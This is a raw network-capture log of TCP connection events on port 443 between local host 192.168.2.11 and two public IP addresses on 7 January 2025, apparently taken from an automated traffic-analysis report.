                                                                                                                    Jan 7, 2025 13:18:30.662856102 CET49771443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:30.662862062 CET44349771142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:30.663120985 CET49771443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:30.663132906 CET44349771142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:30.697844028 CET44349772142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:30.697906971 CET49772443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:30.698491096 CET49772443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:30.698512077 CET44349772142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:30.698678017 CET49772443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:30.698684931 CET44349772142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:30.904220104 CET44349768142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:30.904285908 CET49768443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:30.904294968 CET44349768142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:30.904339075 CET49768443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:30.904548883 CET49768443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:30.904582977 CET44349768142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:30.904630899 CET49768443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:30.905184984 CET49780443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:30.905209064 CET44349780142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:30.905275106 CET49780443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:30.905448914 CET49780443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:30.905459881 CET44349780142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:30.922741890 CET44349769142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:30.922811031 CET49769443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:30.922826052 CET44349769142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:30.922863007 CET49769443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:30.923060894 CET49769443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:30.923111916 CET44349769142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:30.923197031 CET49769443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:30.923643112 CET49781443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:30.923671961 CET44349781142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:30.923737049 CET49781443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:30.923998117 CET49781443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:30.924021006 CET44349781142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.207685947 CET44349772142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.207726955 CET44349772142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.207760096 CET49772443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:31.207771063 CET44349772142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.207830906 CET44349772142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.207885027 CET49772443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:31.208117008 CET49772443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:31.209347010 CET49782443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:31.209374905 CET44349782142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.209388971 CET49772443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:31.209400892 CET44349772142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.209697962 CET49782443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:31.210129976 CET49782443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:31.210140944 CET44349782142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.212759018 CET44349771142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.212795019 CET44349771142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.212910891 CET44349771142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.212913990 CET49771443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:31.213057041 CET49771443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:31.213632107 CET49771443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:31.213646889 CET44349771142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.214258909 CET49784443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:31.214288950 CET44349784142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.214652061 CET49784443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:31.214652061 CET49784443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:31.214682102 CET44349784142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.554946899 CET44349780142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.555433035 CET49780443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:31.555784941 CET44349780142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.556176901 CET49780443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:31.557493925 CET44349781142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.558398008 CET44349781142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.558470964 CET49781443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:31.558505058 CET44349781142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.559566975 CET49780443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:31.559577942 CET44349780142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.559597015 CET49781443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:31.559864044 CET44349780142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.560487986 CET49780443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:31.560487986 CET49780443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:31.561708927 CET49781443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:31.561717987 CET44349781142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.561995983 CET44349781142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.562612057 CET49781443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:31.562612057 CET49781443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:31.607336998 CET44349781142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.607342005 CET44349780142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.838161945 CET44349782142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.838958979 CET49782443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:31.838958979 CET49782443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:31.838985920 CET44349782142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.840670109 CET49782443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:31.840678930 CET44349782142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.842889071 CET44349784142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.843348026 CET49784443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:31.843348026 CET49784443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:31.843364954 CET44349784142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.843616009 CET49784443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:31.843622923 CET44349784142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.948096991 CET44349780142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.948182106 CET49780443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:31.948201895 CET44349780142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.948303938 CET49780443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:31.948375940 CET49780443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:31.948497057 CET44349780142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.948636055 CET44349780142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.948662043 CET49780443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:31.948750019 CET49780443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:31.948862076 CET49792443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:31.948888063 CET44349792142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.948966026 CET49792443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:31.949193954 CET49792443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:31.949204922 CET44349792142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.951637030 CET44349781142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.951776028 CET49781443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:31.951792955 CET44349781142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.951900959 CET49781443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:31.951900959 CET49781443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:31.951956034 CET44349781142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.952161074 CET49781443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:31.952275038 CET49793443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:31.952301979 CET44349793142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:31.952531099 CET49793443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:31.952531099 CET49793443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:31.952564001 CET44349793142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:32.400347948 CET44349782142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:32.400389910 CET44349782142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:32.400455952 CET49782443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:32.400485039 CET44349782142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:32.400537014 CET44349782142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:32.400588036 CET49782443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:32.404544115 CET49782443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:32.404572964 CET44349782142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:32.405456066 CET49801443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:32.405494928 CET44349801142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:32.405560017 CET49801443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:32.405962944 CET49801443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:32.405977011 CET44349801142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:32.407404900 CET44349784142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:32.407454967 CET49784443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:32.407461882 CET44349784142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:32.407478094 CET44349784142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:32.407505989 CET49784443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:32.407537937 CET49784443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:32.407547951 CET44349784142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:32.407591105 CET49784443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:32.407599926 CET44349784142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:32.407620907 CET44349784142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:32.407643080 CET49784443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:32.407665014 CET49784443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:32.408756971 CET49784443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:32.408773899 CET44349784142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:32.409528971 CET49802443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:32.409560919 CET44349802142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:32.409641981 CET49802443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:32.409960985 CET49802443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:32.409975052 CET44349802142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:32.459796906 CET49792443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:32.459857941 CET49793443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:32.459888935 CET49801443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:32.459912062 CET49802443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:32.956984997 CET49806443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:32.957026005 CET44349806142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:32.957123995 CET49806443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:32.958517075 CET49806443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:32.958529949 CET44349806142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:32.961069107 CET49807443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:32.961102962 CET44349807142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:32.961225986 CET49807443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:32.962647915 CET49807443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:32.962668896 CET44349807142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:33.601870060 CET44349806142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:33.601943970 CET49806443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:33.603022099 CET44349806142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:33.603081942 CET49806443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:33.609689951 CET44349807142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:33.609785080 CET49807443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:33.610470057 CET44349807142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:33.610528946 CET49807443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:33.612890005 CET49806443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:33.612905025 CET44349806142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:33.613255024 CET44349806142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:33.613317013 CET49806443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:33.613663912 CET49806443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:33.614300013 CET49807443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:33.614310980 CET44349807142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:33.614586115 CET44349807142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:33.614809036 CET49807443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:33.615091085 CET49807443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:33.655327082 CET44349807142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:33.655338049 CET44349806142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:33.998523951 CET44349806142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:33.998596907 CET49806443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:33.998625994 CET44349806142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:33.998667002 CET49806443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:33.998775959 CET49806443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:33.998819113 CET44349806142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:33.998861074 CET49806443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:33.999403954 CET49818443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:33.999444962 CET44349818142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:33.999527931 CET49818443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:33.999536037 CET49819443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:33.999576092 CET44349819142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:33.999634981 CET49819443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:34.000098944 CET49819443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:34.000102997 CET49818443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:34.000113964 CET44349819142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:34.000122070 CET44349818142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:34.040278912 CET44349807142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:34.040337086 CET49807443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:34.040349960 CET44349807142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:34.040388107 CET49807443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:34.040534019 CET49807443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:34.040570974 CET44349807142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:34.040621042 CET49807443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:34.041268110 CET49821443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:34.041301012 CET44349821142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:34.041316032 CET49820443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:34.041364908 CET44349820142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:34.041373014 CET49821443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:34.041663885 CET49821443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:34.041680098 CET44349821142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:34.041707993 CET49820443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:34.041919947 CET49820443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:34.041934013 CET44349820142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:34.646856070 CET44349819142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:34.646930933 CET49819443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:34.650774002 CET49819443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:34.650779963 CET44349819142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:34.651093006 CET44349819142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:34.651149988 CET49819443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:34.651556015 CET49819443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:34.657499075 CET44349818142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:34.657577038 CET49818443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:34.658273935 CET44349818142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:34.658339024 CET49818443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:34.659898996 CET49818443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:34.659907103 CET44349818142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:34.660151958 CET44349818142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:34.660214901 CET49818443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:34.660531044 CET49818443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:34.681148052 CET44349821142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:34.681222916 CET49821443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:34.683640003 CET49821443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:34.683645010 CET44349821142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:34.683872938 CET44349821142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:34.684005022 CET49821443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:34.684320927 CET49821443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:34.699337006 CET44349819142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:34.700006962 CET44349820142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:34.700068951 CET49820443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:34.700862885 CET44349820142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:34.700932026 CET49820443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:34.702756882 CET49820443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:34.702769995 CET44349820142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:34.703011036 CET44349820142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:34.703059912 CET49820443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:34.703460932 CET49820443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:34.707331896 CET44349818142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:34.731323004 CET44349821142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:34.747333050 CET44349820142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.057858944 CET44349818142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.057945013 CET49818443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:35.057971954 CET44349818142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.058105946 CET49818443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:35.058351994 CET44349818142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.058396101 CET44349818142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.058402061 CET49818443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:35.058480978 CET49818443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:35.081825018 CET49818443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:35.081835032 CET44349818142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.082700968 CET49828443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:35.082740068 CET44349828142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.082798004 CET49828443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:35.089560986 CET49828443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:35.089579105 CET44349828142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.116790056 CET44349820142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.116843939 CET49820443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:35.116852999 CET44349820142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.116904020 CET49820443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:35.120588064 CET49820443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:35.120599031 CET44349820142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.123995066 CET49829443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:35.124027967 CET44349829142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.124268055 CET49829443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:35.128737926 CET49829443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:35.128752947 CET44349829142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.142724991 CET44349821142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.142771006 CET44349821142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.142781973 CET49821443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:35.142793894 CET44349821142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.142813921 CET49821443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:35.142853975 CET49821443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:35.142858982 CET44349821142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.142868042 CET44349821142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.142935038 CET49821443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:35.143980026 CET49821443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:35.143987894 CET44349821142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.144694090 CET49830443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:35.144728899 CET44349830142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.144903898 CET49830443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:35.145339966 CET49830443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:35.145354986 CET44349830142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.150571108 CET44349819142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.150621891 CET49819443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:35.150631905 CET44349819142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.150644064 CET44349819142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.150672913 CET49819443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:35.150705099 CET49819443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:35.150712013 CET44349819142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.150764942 CET49819443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:35.150765896 CET44349819142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.154181957 CET49819443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:35.169692039 CET49819443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:35.169711113 CET44349819142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.170326948 CET49831443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:35.170368910 CET44349831142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:35.170433044 CET49831443192.168.2.11142.250.186.161
